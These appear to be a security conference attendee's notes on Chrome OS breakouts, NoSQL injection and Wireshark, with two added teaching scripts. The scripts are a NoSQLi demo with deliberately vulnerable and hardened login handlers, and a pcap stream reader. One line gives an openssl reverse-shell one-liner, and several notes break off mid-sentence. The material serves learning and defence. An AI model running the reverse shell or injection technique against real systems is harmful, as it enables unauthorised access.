Moebius ANSI Art Editor
This is the Lost Rabbit Labs people. I saw them at a DC 303 meet-up.
This vulnerability was actually patched two years ago by Google…
This is a breakout from the Chrome OS guest user via the Crosh shell using command injection in the
The Pico Ducky is a Rubber Ducky work-alike that runs on a Raspberry Pi Pico. It’s much faster than Hak5’s tool.
Interesting redirect trick - use 1>&2 to redirect STDOUT to STDERR (the reverse of what is normally done) to bypass some output filtering.
You can pipe openssl for a reverse shell! Something like:
mkfifo /tmp/irl; /bin/sh -i < /tmp/irl 2>&1 | openssl s_client -quiet -connect 127.0.0.1:1337 > /tmp/irl; rm /tmp/irl
In older versions of Chrome OS, the Crosh shell could actually be launched in Dev Mode (without switching the entire box to Dev Mode) using crosh --dev (via set_apn command injection).
SQLite shell escape:
Oof… There were (are?) hard-coded SSH public keys on Chrome OS; the corresponding private key was (is?) available in the Chromium code repo.
Chrome OS has a restricted finger command called pinky that’s used internally.
If you can get to dbus on a Chromebook, you can access some (but not all!) Dev Mode tools (like
(I wasn’t able to catch the end of this presentation, however, as I needed to head out to my last workshop…)
TIL: There is such a thing as NoSQLi, and it’s way easier than SQLi - just drop objects containing search operators into the NoSQL queries instead of actual data!
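Added example (not from the notes above, and not tied to any real application): a tiny in-memory matcher that mimics the subset of document-store query semantics that makes NoSQLi work (a plain value means equality, a dict is read as operators), beside a login handler that forwards the decoded JSON body into the query as-is and a hardened one that only accepts plain strings. The user records, the request bodies and the `contains_operator` detection helper are all constructed for this example.

```python
"""Why operator objects in a JSON body turn into a query, and how a type check
stops it. The matcher below is a constructed stand-in for a document store;
it implements only $ne, $gt and $regex, which is enough to show the point."""
import re

# Constructed sample collection; nothing here is real.
USERS = [
    {"username": "alice", "password": "hunter2"},
    {"username": "admin", "password": "s3cr3t-Pa55"},
]


def _field_matches(value, condition):
    """Mimic how a document store evaluates one field of a query: a scalar
    condition is an equality test, a dict is a set of operators."""
    if not isinstance(condition, dict):
        return value == condition
    for op, arg in condition.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$gt":
            try:
                if not value > arg:
                    return False
            except TypeError:      # incomparable types never match
                return False
        elif op == "$regex":
            if not isinstance(value, str) or not re.search(arg, value):
                return False
        else:
            raise ValueError(f"unsupported operator {op}")
    return True


def find(collection, query):
    """Return every document for which all query fields match."""
    return [doc for doc in collection
            if all(_field_matches(doc.get(k), v) for k, v in query.items())]


def login_vulnerable(body):
    """Forwards whatever the client sent, so a dict in the body becomes
    an operator clause instead of a credential value."""
    return find(USERS, {"username": body["username"], "password": body["password"]})


def login_hardened(body):
    """Accept only plain strings; operator objects never reach the query."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("credentials must be strings")
    return find(USERS, {"username": username, "password": password})


def contains_operator(value):
    """Detection helper for a gateway or request log: True if any key anywhere
    in a decoded JSON body starts with the '$' operator prefix."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False
```

The check that matters is the `isinstance(..., str)` test in `login_hardened`: a JSON decoder happily yields dicts where the handler expected strings, and the query layer then treats those dicts as operators. A schema validator on the request body does the same job more generally, and `contains_operator` is the kind of predicate worth wiring into request logging so attempts show up even where the handler is already safe.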
You can search within packets in Wireshark using the filter frame contains "$TEXT_TO_SEARCH".
If you can find an encryption key in a packet dump, you can try applying it to encrypted packets in Wireshark using “Preferences > RSA Keys”.
Wireshark can easily extract files from HTTP conversations. To extract them from raw TCP streams, (1) locate the beginning of the stream, (2) right-click on the packet and select “Follow > TCP Stream”, (3) change “Show data as” to “Raw”, and (4) save it off using “Save As”.
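Added example (not from the notes, and not Wireshark code): a minimal pcap reader in pure Python that reproduces the two Wireshark tasks above offline, a `frame contains` search over raw frame bytes and a one-direction “Follow > TCP Stream” that orders segments by sequence number and drops retransmissions, yielding the same bytes the “Raw” view would save. The capture is constructed in memory (Ethernet/IPv4/TCP frames with zero checksums); the reader assumes a little-endian pcap with link type 1 and does not handle sequence-number wraparound or overlapping segments.

```python
"""Offline 'frame contains' and 'Follow TCP Stream' over a constructed pcap."""
import socket
import struct


def _ipv4_tcp_frame(src, dst, sport, dport, seq, payload):
    """Build a constructed Ethernet/IPv4/TCP frame. Checksums are left zero;
    the reader below never verifies them."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Serialise frames as a little-endian pcap file (magic a1b2c3d4, linktype 1)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def read_pcap(data):
    """Return the list of raw frames from pcap bytes; refuses other magics/link types."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", data[:24])
    if magic != 0xA1B2C3D4 or linktype != 1:
        raise ValueError("expected little-endian pcap with Ethernet link type")
    frames, off = [], 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack("<IIII", data[off:off + 16])
        frames.append(data[off + 16:off + 16 + incl_len])
        off += 16 + incl_len
    return frames


def frame_contains(frames, needle):
    """Equivalent of the display filter  frame contains "needle"  (1-based frame
    numbers, as Wireshark shows them)."""
    return [i + 1 for i, frame in enumerate(frames) if needle in frame]


def _parse_tcp(frame):
    """Return (src, dst, sport, dport, seq, payload), or None for non-IPv4/TCP frames."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[16:18])[0]
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    tcp = frame[14 + ihl:14 + total_len]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    doff = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, seq, tcp[doff:]


def follow_tcp_stream(frames, src, sport, dst, dport):
    """Reassemble one direction of a stream, as Follow > TCP Stream with
    'Show data as: Raw' would: order by sequence number, keep the first copy
    of a retransmitted segment, ignore every other conversation."""
    segments = {}
    for frame in frames:
        p = _parse_tcp(frame)
        if p and p[:4] == (src, dst, sport, dport) and p[5]:
            segments.setdefault(p[4], p[5])
    return b"".join(segments[s] for s in sorted(segments))


# Constructed capture: a request split across two segments that arrive out of
# order, a retransmission of the first, the server's reply, and an unrelated
# conversation from another host that also happens to contain "GET".
CLIENT, SERVER = "10.0.0.5", "10.0.0.80"
REQ1, REQ2 = b"GET /f.bin HTTP/1.1\r\n", b"Host: cap\r\n\r\n"
RESP = b"HTTP/1.1 200 OK\r\n\r\n\x00\x01\x02"
SAMPLE_PCAP = build_pcap([
    _ipv4_tcp_frame(CLIENT, SERVER, 40000, 80, 1000 + len(REQ1), REQ2),
    _ipv4_tcp_frame(CLIENT, SERVER, 40000, 80, 1000, REQ1),
    _ipv4_tcp_frame(CLIENT, SERVER, 40000, 80, 1000, REQ1),
    _ipv4_tcp_frame(SERVER, CLIENT, 80, 40000, 5000, RESP),
    _ipv4_tcp_frame("10.0.0.9", SERVER, 40001, 80, 1, b"GET /other HTTP/1.1\r\n"),
])

if __name__ == "__main__":
    frames = read_pcap(SAMPLE_PCAP)
    print("frames containing GET:", frame_contains(frames, b"GET"))
    print(follow_tcp_stream(frames, CLIENT, 40000, SERVER, 80))
```

To carve a file out of a real capture the way step (4) describes, call `follow_tcp_stream` for the server-to-client direction and write the returned bytes with `open(path, "wb")`; whatever precedes the file body (HTTP headers, for instance) still has to be stripped by hand, exactly as with Wireshark's Raw view.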